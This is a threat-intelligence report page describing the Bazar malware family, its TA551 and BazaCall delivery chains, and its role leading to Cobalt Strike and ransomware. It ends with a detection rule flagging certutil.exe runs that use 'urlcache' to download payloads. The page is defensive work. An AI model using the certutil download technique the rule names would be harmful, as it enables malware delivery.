Skip Navigation
Get a Demo
 
 
 
 
 
 
 
 
 
 

Relevant threats of 2021

Bazar

The Bazar family of malware continued to be active in 2021, spurring ransomware infections.

Pairs with this song
 

Editor’s note: While the detection opportunities and analysis on this page are still relevant, it has not been updated since 2022. 

Analysis

The Bazar malware family was quite active in 2021, spreading via multiple delivery affiliates, including TA551 and BazaCall. There are many names for Bazar (sometimes referred to as “Baza”) floating around that refer to various parts of the intrusion chain. Bazar is relevant because of its role as a malware precursor, and many 2021 intrusions starting with Bazar led to ransomware like Ryuk and Conti. The Bazar malware family encompasses a loader, BazarLoader, and backdoor, BazarBackdoor. These components have been delivered via multiple delivery affiliates. As we discuss in the Affiliates section of this report, differentiating initial delivery affiliates from loaders and payloads will help you understand each phase of the threat and how to better protect your organization.

One affiliate we’ve been tracking for a while, TA551, began delivering Bazar during 2021. While TA551 relied on email attachments to deliver Bazar, another affiliate behind a 2021 phishing campaign known as BazaCall opted to trick users into calling a phone number sent in an email. After a victim called the number, an adversary provided step-by-step instructions that led to downloading Bazar malware. (Check out Brad Duncan’s video for an example of how this intrusion plays out.) Once BazaLoader was installed, BazaCall led to Cobalt Strike and eventually, ransomware.

Detection opportunities

Microsoft Certificate Services using certutil.exe to initiate download

This detection analytic looks for instances of the Microsoft Certificate Utility (certutil.exe) initiating a download, a technique used to download Bazar payloads.

process == certutil.exe
&&
command_line_includes ('urlcache')
 
 
Back to Top